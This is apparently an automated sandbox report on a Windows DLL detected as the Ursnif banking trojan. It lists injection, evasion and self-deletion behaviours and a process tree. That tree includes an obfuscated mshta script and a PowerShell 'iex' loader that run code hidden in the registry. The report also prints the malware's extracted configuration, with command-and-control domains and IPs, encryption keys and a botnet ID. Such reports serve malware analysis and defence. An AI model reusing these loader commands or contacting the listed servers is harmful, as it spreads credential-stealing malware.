Edit tour
Windows
Analysis Report
lokvQRcUe0
Overview
General Information
Detection
Ursnif
Score: | 100 |
Range: | 0 - 100 |
Whitelisted: | false |
Confidence: | 100% |
Signatures
Found malware configuration
Multi AV Scanner detection for submitted file
Yara detected Ursnif
System process connects to network (likely due to code injection or exploit)
Antivirus detection for URL or domain
Snort IDS alert for network traffic
Maps a DLL or memory area into another process
Writes to foreign memory regions
Changes memory attributes in foreign processes to executable or writable
Machine Learning detection for sample
Allocates memory in foreign processes
Self deletion via cmd delete
Injects code into the Windows Explorer (explorer.exe)
Modifies the context of a thread in another process (thread injection)
Creates a thread in another existing process (thread injection)
Disables SPDY (HTTP compression, likely to perform web injects)
Writes registry values via WMI
Uses 32bit PE files
Queries the volume information (name, serial number etc) of a device
One or more processes crash
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
May sleep (evasive loops) to hinder dynamic analysis
Uses code obfuscation techniques (call, push, ret)
Found evasive API chain (date check)
PE file contains sections with non-standard names
Internet Provider seen in connection with other malware
Detected potential crypto function
Contains functionality to query CPU information (cpuid)
Contains functionality to launch a process as a different user
Sample execution stops while process was sleeping (likely an evasion)
Contains functionality to call native functions
Contains functionality to dynamically determine API calls
Found dropped PE file which has not been started or loaded
Contains long sleeps (>= 3 min)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Sample file is different than original file name gathered from version info
PE file contains an invalid checksum
Searches for the Microsoft Outlook file path
PE file contains strange resources
Drops PE files
Uses a known web browser user agent for HTTP communication
Found evasive API chain checking for process token information
Checks if the current process is being debugged
Compiles C# or VB.Net code
Uses Microsoft's Enhanced Cryptographic Provider
Creates a process in suspended mode (likely to inject code)
Classification
- System is w10x64
- loaddll32.exe (PID: 6352 cmdline:
loaddll32. exe "C:\Us ers\user\D esktop\lok vQRcUe0.dl l" MD5: 7DEB5DB86C0AC789123DEC286286B938) - cmd.exe (PID: 6360 cmdline:
cmd.exe /C rundll32. exe "C:\Us ers\user\D esktop\lok vQRcUe0.dl l",#1 MD5: F3BDBE3BB6F734E357235F4D5898582D) - rundll32.exe (PID: 6380 cmdline:
rundll32.e xe "C:\Use rs\user\De sktop\lokv QRcUe0.dll ",#1 MD5: D7CA562B0DB4F4DD0F03A89A1FDAD63D) - control.exe (PID: 2388 cmdline:
C:\Windows \system32\ control.ex e -h MD5: 625DAC87CB5D7D44C5CA1DA57898065F) - WerFault.exe (PID: 6440 cmdline:
C:\Windows \SysWOW64\ WerFault.e xe -u -p 6 352 -s 272 MD5: 9E2B8ACAD48ECCA55C0230D63623661B) - WerFault.exe (PID: 6616 cmdline:
C:\Windows \SysWOW64\ WerFault.e xe -u -p 6 352 -s 396 MD5: 9E2B8ACAD48ECCA55C0230D63623661B) - WerFault.exe (PID: 6836 cmdline:
C:\Windows \SysWOW64\ WerFault.e xe -u -p 6 352 -s 424 MD5: 9E2B8ACAD48ECCA55C0230D63623661B)
- mshta.exe (PID: 6356 cmdline:
C:\Windows \System32\ mshta.exe" "about:<h ta:applica tion><scri pt>Kxac='w script.she ll';resize To(0,2);ev al(new Act iveXObject (Kxac).reg read('HKCU \\\Softwar e\\AppData Low\\Softw are\\Micro soft\\54E8 0703-A337- A6B8-CDC8- 873A517CAB 0E\\\TestL ocal'));if (!window.f lag)close( )</script> MD5: 197FC97C6A843BEBB445C1D9C58DCBDB) - powershell.exe (PID: 6564 cmdline:
"C:\Window s\System32 \WindowsPo werShell\v 1.0\powers hell.exe" new-alias -name ltqe fvure -val ue gp; new -alias -na me vftdnxv da -value iex; vftdn xvda ([Sys tem.Text.E ncoding]:: ASCII.GetS tring((ltq efvure "HK CU:Softwar e\AppDataL ow\Softwar e\Microsof t\54E80703 -A337-A6B8 -CDC8-873A 517CAB0E") .UrlsRetur n)) MD5: 95000560239032BC68B4C2FDFCDEF913) - conhost.exe (PID: 4588 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496) - csc.exe (PID: 7044 cmdline:
C:\Windows \Microsoft .NET\Frame work64\v4. 0.30319\cs c.exe" /no config /fu llpaths @" C:\Users\u ser\AppDat a\Local\Te mp\b5khtop v.cmdline MD5: B46100977911A0C9FB1C3E5F16A5017D) - cvtres.exe (PID: 7020 cmdline:
C:\Windows \Microsoft .NET\Frame work64\v4. 0.30319\cv tres.exe / NOLOGO /RE ADONLY /MA CHINE:IX86 "/OUT:C:\ Users\user \AppData\L ocal\Temp\ RESE691.tm p" "c:\Use rs\user\Ap pData\Loca l\Temp\CSC 7CF5F35C72 0441118B71 E863AB44B8 7A.TMP" MD5: 33BB8BE0B4F547324D93D5D2725CAC3D) - csc.exe (PID: 6644 cmdline:
C:\Windows \Microsoft .NET\Frame work64\v4. 0.30319\cs c.exe" /no config /fu llpaths @" C:\Users\u ser\AppDat a\Local\Te mp\kikzslf g.cmdline MD5: B46100977911A0C9FB1C3E5F16A5017D) - cvtres.exe (PID: 4600 cmdline:
C:\Windows \Microsoft .NET\Frame work64\v4. 0.30319\cv tres.exe / NOLOGO /RE ADONLY /MA CHINE:IX86 "/OUT:C:\ Users\user \AppData\L ocal\Temp\ RESFE5F.tm p" "c:\Use rs\user\Ap pData\Loca l\Temp\CSC 72CD5E3A7B FC47C08453 C5B847B47E 88.TMP" MD5: 33BB8BE0B4F547324D93D5D2725CAC3D) - explorer.exe (PID: 3968 cmdline:
C:\Windows \Explorer. EXE MD5: AD5296B280E8F522A8A897C96BAB0E1D) - cmd.exe (PID: 5580 cmdline:
C:\Windows \System32\ cmd.exe" / C ping loc alhost -n 5 && del " C:\Users\u ser\Deskto p\lokvQRcU e0.dll MD5: 4E2ACF4F8A396486AB4268C94A6A245F) - conhost.exe (PID: 6024 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
- cleanup
{"RSA Public Key": "WNd6IZBAE2hic5I1vBvTbN5vraX26aprGyHDrt/+eglFMVKwHFISXmgegfDVQ9JN9IUBekU+LfpLvYZv7zcwNdRn5M8aw4eWI4bhXGfXhg2rVYeSiUnG1MC8lOzPSzU/SYBFMQ3nL+vB66ov2XPPmoP4rSDS0CC6n6OlCY+w5hwtLwivxH53vqcLh3WTh2ZNXxBC6Zc4STr3Ek0KlqqVtSr6/5fGwBuo8VUIBdXBWxDjxcGYyua+/PQsbUFFnwV7HET72C1unl+X1RemGW2bFwrlyX4Q85gTacSXgMufXChh3wAcaiq0qhw5JwdEPrdIO+t+/C9wfw4K/YIRIDiXpoorOLszNh6osFoQvZIrAl8=", "c2_domain": ["cabrioxmdes.at", "gamexperts.net", "37.10.71.138", "185.158.250.51"], "ip_check_url": ["http://ipinfo.io/ip", "http://curlmyip.net"], "serpent_key": "Jv1GYc8A8hCBIeVD", "tor32_dll": "file://c:\\test\\test32.dll", "tor64_dll": "file://c:\\test\\tor64.dll", "server": "50", "sleep_time": "1", "SetWaitableTimer_value(CRC_CONFIGTIMEOUT)": "60", "time_value": "60", "SetWaitableTimer_value(CRC_TASKTIMEOUT)": "60", "SetWaitableTimer_value(CRC_SENDTIMEOUT)": "300", "SetWaitableTimer_value(CRC_KNOCKERTIMEOUT)": "60", "not_use(CRC_BCTIMEOUT)": "10", "botnet": "3000", "SetWaitableTimer_value": "1"}
Source | Rule | Description | Author | Strings |
---|---|---|---|---|
JoeSecurity_Ursnif_1 | Yara detected Ursnif | Joe Security | ||
JoeSecurity_Ursnif_1 | Yara detected Ursnif | Joe Security | ||
JoeSecurity_Ursnif | Yara detected Ursnif | Joe Security | ||
JoeSecurity_Ursnif | Yara detected Ursnif | Joe Security | ||
JoeSecurity_Ursnif_1 | Yara detected Ursnif | Joe Security | ||
Click to see the 22 entries |
Source | Rule | Description | Author | Strings |
---|---|---|---|---|
JoeSecurity_Ursnif_1 | Yara detected Ursnif | Joe Security | ||
JoeSecurity_Ursnif_1 | Yara detected Ursnif | Joe Security | ||
JoeSecurity_Ursnif_1 | Yara detected Ursnif | Joe Security | ||
JoeSecurity_Ursnif_1 | Yara detected Ursnif | Joe Security | ||
JoeSecurity_Ursnif_1 | Yara detected Ursnif | Joe Security | ||
Click to see the 2 entries |
⊘No Sigma rule has matched
Timestamp: | 192.168.2.313.107.42.1649743802033203 05/26/22-04:06:31.790854 |
SID: | 2033203 |
Source Port: | 49743 |
Destination Port: | 80 |
Protocol: | TCP |
Classtype: | A Network Trojan was detected |
Timestamp: | 192.168.2.3176.10.119.6849752802033204 05/26/22-04:06:53.058632 |
SID: | 2033204 |
Source Port: | 49752 |
Destination Port: | 80 |
Protocol: | TCP |
Classtype: | A Network Trojan was detected |
Timestamp: | 192.168.2.3176.10.119.6849752802033203 05/26/22-04:06:53.058632 |
SID: | 2033203 |
Source Port: | 49752 |
Destination Port: | 80 |
Protocol: | TCP |
Classtype: | A Network Trojan was detected |
Click to jump to signature section
Show All Signature Results
AV Detection |
---|
Source: | Malware Configuration Extractor: |
Source: | ReversingLabs: |
Source: | Avira URL Cloud: | ||
Source: | Avira URL Cloud: | ||
Source: | Avira URL Cloud: | ||
Source: | Avira URL Cloud: | ||
Source: | Avira URL Cloud: | ||
Source: | Avira URL Cloud: |
Source: | Joe Sandbox ML: |
Source: | Code function: | 2_2_04A15FBB |
Source: | Static PE information: |
Source: | Binary string: | ||
Source: | Binary string: | ||
Source: | Binary string: |
Source: | Code function: | 2_2_04F665C2 | |
Source: | Code function: | 2_2_04F699BC | |
Source: | Code function: | 2_2_04F7BAD1 |
Source: | Code function: | 2_2_04F6FD47 |
Networking |
---|
Source: | Network Connect: | Jump to behavior |
Source: | Snort IDS: | ||
Source: | Snort IDS: | ||
Source: | Snort IDS: |
Source: | ASN Name: |
Source: | HTTP traffic detected: | ||
Source: | HTTP traffic detected: | ||
Source: | HTTP traffic detected: |
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: |
Source: | Code function: | 2_2_04A11CA5 |
Source: | HTTP traffic detected: | ||
Source: | HTTP traffic detected: | ||
Source: | HTTP traffic detected: |
Key, Mouse, Clipboard, Microphone and Screen Capturing |
---|
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: |
E-Banking Fraud |
---|
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: |
Source: | Registry key value created / modified: |
Source: | Code function: | 2_2_04A15FBB |
System Summary |
---|
Source: | WMI Registry write: | ||
Source: | WMI Registry write: | ||
Source: | WMI Registry write: | ||
Source: | WMI Registry write: | ||
Source: | WMI Registry write: | ||
Source: | WMI Registry write: | ||
Source: | WMI Registry write: | ||
Source: | WMI Registry write: |
Source: | Static PE information: |
Source: | Process created: |
Source: | Code function: | 2_2_04A1829C | |
Source: | Code function: | 2_2_04A11645 | |
Source: | Code function: | 2_2_04A14BF1 | |
Source: | Code function: | 2_2_04F83DB0 | |
Source: | Code function: | 2_2_04F7154D | |
Source: | Code function: | 2_2_04F7D7F1 | |
Source: | Code function: | 2_2_04F667CA | |
Source: | Code function: | 2_2_04F7FF4D | |
Source: | Code function: | 2_2_04F6B238 | |
Source: | Code function: | 34_2_00DAB4B8 | |
Source: | Code function: | 34_2_00DAEEF8 | |
Source: | Code function: | 34_2_00DA9660 | |
Source: | Code function: | 34_2_00DC98A8 | |
Source: | Code function: | 34_2_00DC80A8 | |
Source: | Code function: | 34_2_00DC7850 | |
Source: | Code function: | 34_2_00DB1864 | |
Source: | Code function: | 34_2_00DB2830 | |
Source: | Code function: | 34_2_00DBB9E0 | |
Source: | Code function: | 34_2_00DC51A8 | |
Source: | Code function: | 34_2_00DA716C | |
Source: | Code function: | 34_2_00DA5110 | |
Source: | Code function: | 34_2_00DA410C | |
Source: | Code function: | 34_2_00DBE120 | |
Source: | Code function: | 34_2_00DC2AD8 | |
Source: | Code function: | 34_2_00DC8AC0 | |
Source: | Code function: | 34_2_00DB1248 | |
Source: | Code function: | 34_2_00DB4240 | |
Source: | Code function: | 34_2_00DCC220 | |
Source: | Code function: | 34_2_00DC73EC | |
Source: | Code function: | 34_2_00DA34D8 | |
Source: | Code function: | 34_2_00DCD4D4 | |
Source: | Code function: | 34_2_00DC34C0 | |
Source: | Code function: | 34_2_00DB6CA4 | |
Source: | Code function: | 34_2_00DCAC50 | |
Source: | Code function: | 34_2_00DBC46C | |
Source: | Code function: | 34_2_00DAD404 | |
Source: | Code function: | 34_2_00DA3C3C | |
Source: | Code function: | 34_2_00DC2428 | |
Source: | Code function: | 34_2_00DC7DB4 | |
Source: | Code function: | 34_2_00DA9D1C | |
Source: | Code function: | 34_2_00DBCD1C | |
Source: | Code function: | 34_2_00DC0530 | |
Source: | Code function: | 34_2_00DBBED0 | |
Source: | Code function: | 34_2_00DB2EE8 | |
Source: | Code function: | 34_2_00DC5684 | |
Source: | Code function: | 34_2_00DA1EA8 | |
Source: | Code function: | 34_2_00DC1E5C | |
Source: | Code function: | 34_2_00DB8670 | |
Source: | Code function: | 34_2_00DC1638 | |
Source: | Code function: | 34_2_00DB4F5C | |
Source: | Code function: | 34_2_00DB6F78 | |
Source: | Code function: | 34_2_00DC772C | |
Source: | Code function: | 34_2_00DA572C |
Source: | Code function: | 2_2_04F78E57 |
Source: | Code function: | 2_2_04A14321 | |
Source: | Code function: | 2_2_04A16D0A | |
Source: | Code function: | 2_2_04A1190C | |
Source: | Code function: | 2_2_04A184C1 | |
Source: | Code function: | 2_2_04F674AE | |
Source: | Code function: | 2_2_04F6C431 | |
Source: | Code function: | 2_2_04F76DE0 | |
Source: | Code function: | 2_2_04F7BE80 | |
Source: | Code function: | 2_2_04F70782 | |
Source: | Code function: | 2_2_04F700DC | |
Source: | Code function: | 2_2_04F7A806 | |
Source: | Code function: | 2_2_04F761AE | |
Source: | Code function: | 2_2_04F77950 | |
Source: | Code function: | 2_2_04F6710A | |
Source: | Code function: | 2_2_04F72331 | |
Source: | Code function: | 2_2_04F75312 | |
Source: | Code function: | 2_2_04F664C4 | |
Source: | Code function: | 2_2_04F636BB | |
Source: | Code function: | 2_2_04F6B7D5 | |
Source: | Code function: | 2_2_04F6D77A | |
Source: | Code function: | 2_2_04F610C7 | |
Source: | Code function: | 2_2_04F73829 | |
Source: | Code function: | 2_2_04F7EAC5 | |
Source: | Code function: | 2_2_04F75220 | |
Source: | Code function: | 34_2_00DA40C0 | |
Source: | Code function: | 34_2_00DB583C | |
Source: | Code function: | 34_2_00DB41D8 | |
Source: | Code function: | 34_2_00DCA148 | |
Source: | Code function: | 34_2_00DAAA6C | |
Source: | Code function: | 34_2_00DC04CC | |
Source: | Code function: | 34_2_00DA65E4 | |
Source: | Code function: | 34_2_00DA6D24 | |
Source: | Code function: | 34_2_00DA9660 | |
Source: | Code function: | 34_2_00DDF00C | |
Source: | Code function: | 34_2_00DDF36C |
Source: | Binary or memory string: |
Source: | Key opened: | Jump to behavior |
Source: | Static PE information: |
Source: | ReversingLabs: |
Source: | Static PE information: |
Source: | Key opened: | Jump to behavior |
Source: | Process created: | |||
Source: | Process created: | |||
Source: | Process created: | |||
Source: | Process created: | |||
Source: | Process created: | |||
Source: | Process created: | |||
Source: | Process created: | |||
Source: | Process created: | |||
Source: | Process created: | |||
Source: | Process created: | |||
Source: | Process created: | |||
Source: | Process created: | |||
Source: | Process created: | |||
Source: | Process created: | |||
Source: | Process created: | |||
Source: | Process created: | |||
Source: | Process created: | Jump to behavior | ||
Source: | Process created: | Jump to behavior | ||
Source: | Process created: | Jump to behavior | ||
Source: | Process created: | Jump to behavior | ||
Source: | Process created: | Jump to behavior | ||
Source: | Process created: | Jump to behavior | ||
Source: | Process created: | Jump to behavior | ||
Source: | Process created: | Jump to behavior | ||
Source: | Process created: | |||
Source: | Process created: | |||
Source: | Process created: |
Source: | Key value queried: | Jump to behavior |
Source: | File created: | Jump to behavior |
Source: | File created: | Jump to behavior |
Source: | Classification label: |
Source: | File read: | Jump to behavior |
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior |
Source: | Code function: | 2_2_04A168BD |
Source: | Process created: |
Source: | Mutant created: | ||
Source: | Mutant created: | ||
Source: | Mutant created: | ||
Source: | Mutant created: | ||
Source: | Mutant created: | ||
Source: | Mutant created: |
Source: | File read: | Jump to behavior | ||
Source: | File read: | Jump to behavior | ||
Source: | File read: | Jump to behavior | ||
Source: | File read: | Jump to behavior | ||
Source: | File read: | Jump to behavior | ||
Source: | File read: | Jump to behavior |
Source: | Key opened: | Jump to behavior |
Source: | Window detected: |
Source: | File opened: | Jump to behavior |
Source: | Binary string: | ||
Source: | Binary string: | ||
Source: | Binary string: |
Source: | Code function: | 2_2_04A17EA9 | |
Source: | Code function: | 2_2_04A1829B | |
Source: | Code function: | 2_2_04F63496 | |
Source: | Code function: | 2_2_04F83DAF | |
Source: | Code function: | 2_2_04F838A9 | |
Source: | Code function: | 34_2_00DC4493 |
Source: | Static PE information: |
Source: | Code function: | 2_2_04F6EC00 |
Source: | Static PE information: | ||
Source: | Static PE information: | ||
Source: | Static PE information: |
Source: | Process created: | |||
Source: | Process created: | |||
Source: | Process created: | Jump to behavior | ||
Source: | Process created: | Jump to behavior |
Source: | File created: | Jump to dropped file | ||
Source: | File created: | Jump to dropped file |
Hooking and other Techniques for Hiding and Protection |
---|
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: |
Source: | Process created: | ||
Source: | Process created: |
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior |
Source: | Thread sleep time: | Jump to behavior | ||
Source: | Thread sleep time: |
Source: | Evasive API call chain: |
Source: | Last function: | ||
Source: | Last function: | ||
Source: | Last function: |
Source: | Dropped PE file which has not been started: | Jump to dropped file | ||
Source: | Dropped PE file which has not been started: | Jump to dropped file |
Source: | Thread delayed: | Jump to behavior |
Source: | Window / User API: | Jump to behavior | ||
Source: | Window / User API: | Jump to behavior |
Source: | Check user administrative privileges: |
Source: | Process information queried: | Jump to behavior |
Source: | Code function: | 2_2_04F665C2 | |
Source: | Code function: | 2_2_04F699BC | |
Source: | Code function: | 2_2_04F7BAD1 |
Source: | Thread delayed: | Jump to behavior |
Source: | Code function: | 2_2_04F6FD47 |
Source: | Binary or memory string: | ||
Source: | Binary or memory string: | ||
Source: | Binary or memory string: | ||
Source: | Binary or memory string: | ||
Source: | Binary or memory string: | ||
Source: | Binary or memory string: | ||
Source: | Binary or memory string: | ||
Source: | Binary or memory string: | ||
Source: | Binary or memory string: | ||
Source: | Binary or memory string: | ||
Source: | Binary or memory string: | ||
Source: | Binary or memory string: | ||
Source: | Binary or memory string: | ||
Source: | Binary or memory string: | ||
Source: | Binary or memory string: | ||
Source: | Binary or memory string: | ||
Source: | Binary or memory string: |
Source: | Code function: | 2_2_04F6EC00 |
Source: | Process queried: | Jump to behavior | ||
Source: | Process queried: | Jump to behavior |
Source: | Code function: | 2_2_04F68FEC |
HIPS / PFW / Operating System Protection Evasion |
---|
Source: | Network Connect: | Jump to behavior |
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | |||
Source: | Section loaded: |
Source: | Memory written: | Jump to behavior | ||
Source: | Memory written: | Jump to behavior | ||
Source: | Memory written: | Jump to behavior | ||
Source: | Memory written: | Jump to behavior | ||
Source: | Memory written: | Jump to behavior | ||
Source: | Memory written: | Jump to behavior | ||
Source: | Memory written: | Jump to behavior | ||
Source: | Memory written: | |||
Source: | Memory written: | |||
Source: | Memory written: |
Source: | Memory protected: | ||
Source: | Memory protected: | ||
Source: | Memory protected: | ||
Source: | Memory protected: | ||
Source: | Memory protected: | ||
Source: | Memory protected: | ||
Source: | Memory protected: | ||
Source: | Memory protected: | ||
Source: | Memory protected: |
Source: | Memory allocated: | Jump to behavior | ||
Source: | Memory allocated: |
Source: | Memory written: | Jump to behavior | ||
Source: | Memory written: | Jump to behavior | ||
Source: | Memory written: | Jump to behavior | ||
Source: | Memory written: | Jump to behavior | ||
Source: | Memory written: | |||
Source: | Memory written: | |||
Source: | Memory written: |
Source: | Thread register set: | Jump to behavior | ||
Source: | Thread register set: | Jump to behavior | ||
Source: | Thread register set: | |||
Source: | Thread register set: |
Source: | Thread created: | Jump to behavior | ||
Source: | Thread created: | |||
Source: | Thread created: | |||
Source: | Thread created: |
Source: | Process created: | |||
Source: | Process created: | |||
Source: | Process created: | Jump to behavior |
Source: | Process created: | Jump to behavior | ||
Source: | Process created: | Jump to behavior | ||
Source: | Process created: | Jump to behavior | ||
Source: | Process created: | Jump to behavior | ||
Source: | Process created: | Jump to behavior | ||
Source: | Process created: | Jump to behavior | ||
Source: | Process created: | Jump to behavior | ||
